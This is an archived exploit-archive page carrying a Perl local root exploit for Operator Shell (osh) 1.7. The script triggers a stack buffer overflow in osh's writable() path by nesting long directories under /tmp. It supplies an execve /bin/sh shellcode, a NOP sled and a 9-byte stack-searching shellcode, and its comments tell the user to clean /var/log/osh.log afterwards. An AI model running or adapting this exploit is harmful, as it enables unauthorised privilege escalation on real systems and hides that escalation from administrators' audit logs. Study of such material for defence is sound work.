what you don't know can hurt you

x_osh2-9byte.pl.txt

x_osh2-9byte.pl.txt
Posted Aug 24, 2005
Authored by Charles Stevenson

Operator Shell (osh) 1.7-12 local root exploit. New version of an old exploit. This version has the shellcode trimmed down to 9 bytes thanks to Andrewg.

tags | exploit, shell, local, root, shellcode
MD5 | 8f1aa72893779d145383f8a40c25191e

x_osh2-9byte.pl.txt

Change Mirror Download
#!/usr/bin/perl 
#######################################################################
#
# OSH 1.7 Exploit #2 (Gonna bang away at this until it's removed ;-)
#
# EDUCATIONAL purposes only.... :-)
#
# by Charles Stevenson (core) <core@bokeoa.com>
#
# Description:
# The Operator Shell (Osh) is a setuid root, security enhanced, restricted
# shell. It allows the administrator to carefully limit the access of special
# commands and files to the users whose duties require their use, while
# at the same time automatically maintaining audit records. The configuration
# file for Osh contains an administrator defined access profile for each
# authorized user or group.
#
# Problem (discovered by Solar Eclipse):
#
# handlers.c:364
#
# char temp3[255];
#
# if (*file!='/') {
# getcwd(temp3, MAXPATHLEN);
# strcat(temp3,"/");
# strcat(temp3,file);
# }
#
# ...
#
# "If the length of the current working directory plus the length of the
# file name is longer than 255 bytes, there will be a buffer overflow in
# temp3[]. The size limit of the current direcory is MAXPATHLEN, which is
# defined as 1024 on modern Linux systems. The limit for the file name is
# MAXFNAME, defined as 32 in struct.h:116."
#
# [ilja] MAXPATHLEN on recent glibcs is defined as 4096 i believe
# [ilja] not 1024 as you reported
# [ilja] on fbsd it would be 1024
#
# "This code is in the writable() function, which is called by the handlers
# for built-in cp, vi, rm and test commands, as well as the redirect
# function." -- Solar Eclipse
#
# Risk: Medium since user would have to be in the operator group which
# the admin would have to grant explicitly and I assume would be
# a trustworthy individual ;-)
#
# Solution:
# apt-get --purge remove osh
#
# greetz to solar eclipse, nemo, andrewg, cnn, arcanum, mercy, amnesia,
# banned-it, capsyl, sloth, redsand, KF, akt0r, MRX, salvia, truthix, ...
#
# irc.pulltheplug.org (#social)
# 0dd: much <3 & respect
#
# 08/12/05 - PoC causes segv with 0x41414141 eip
# 08/16/05 - PoC _exit(0) ... need shellcode to get past char filters
# 08/16/05 - Later that night... or morning... ROOTSHELL!! Woot! PTP joint
# effort on the shellcode.
#
# I still find it hard to imagine that anyone would use osh
# The code is basically beyond repair. Sudo is better.... :-)
#
# Don't forget to clean /var/log/osh.log
#
#######################################################################
# PRIVATE - DO NOT DISTRIBUTE - PRIVATE #
#######################################################################


# Yanked from one of KF's exploits.. werd brotha ;-) I'm lazy..
$sc = "\x90" x (511-45) .

# 45 bytes by anthema. 0xff less
"\x89\xe6" . # /* movl %esp, %esi */
"\x83\xc6\x30" . # /* addl $0x30, %esi */
"\xb8\x2e\x62\x69\x6e" . # /bin /* movl $0x6e69622e, %eax */
"\x40" . # /* incl %eax */
"\x89\x06" . # /* movl %eax, (%esi) */
"\xb8\x2e\x73\x68\x21" . # /sh /* movl $0x2168732e, %eax */
"\x40" . # /* incl %eax */
"\x89\x46\x04" . # /* movl %eax, 0x04(%esi) */
"\x29\xc0" . # /* subl %eax, %eax */
"\x88\x46\x07" . # /* movb %al, 0x07(%esi) */
"\x89\x76\x08" . # /* movl %esi, 0x08(%esi) */
"\x89\x46\x0c" . # /* movl %eax, 0x0c(%esi) */
"\xb0\x0b" . # /* movb $0x0b, %al */
"\x87\xf3" . # /* xchgl %esi, %ebx */
"\x8d\x4b\x08" . # /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" . # /* leal 0x0c(%ebx), %edx */
"\xcd\x80"; # /* int $0x80 */

# 0day shellcodez....
#
# Nemo's idea... PTP #social collaborative effort. Searches the stack
# until it finds a nopsled and executes the shellcode
$ptp_sc = "\x61\x66\x3d\x90\x90\x75\xf9\x54\xc3";

# _exit(0);
#"\x31\xc0\x31\xdb\x40\xcd\x80";

print "\nOperator Shell (osh) 1.7-13 root exploit\n";
print "----------------------------------------------\n";
print "Written by Charles Stevenson <core\@bokeoa.com>\n";
print "This exploit would not have been near as fun without\n";
print "the pulltheplug.org community.\n\n";

# Clear out the environment.
foreach $key (keys %ENV) { delete $ENV{$key}; }

# Setup simple env
$ENV{"HELLCODE"} = "$sc";
$ENV{"TERM"} = "linux";
$ENV{"PATH"} = "/usr/local/bin:/usr/bin:/bin";

chdir("/tmp/");

# Create the payload...
mkdir("A"x255,0755);
chdir("A"x255);
mkdir("B"x255,0755);
chdir("B"x255);
mkdir("C"x118,0755);
chdir("C"x118);

#XXX: Commandline can't have: 0x09 0x0a 0x20 0x22 0x24 0x26
# (what made this fun) 0x3b 0x3c 0x3e 0x7c 0xff

#$file = pack("l",0xdeadbeef) . "core";
#$file = pack("l",0x804e36c) . "core";
$file = pack("l",0x804e36c) . $ptp_sc; # inputfp + 12

system("touch '$file'");
system("/usr/sbin/osh test -w '$file'");

print("cleaning up /tmp\n");
chdir("../../../");
system("rm -rf AAAA*/");

# EOF

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close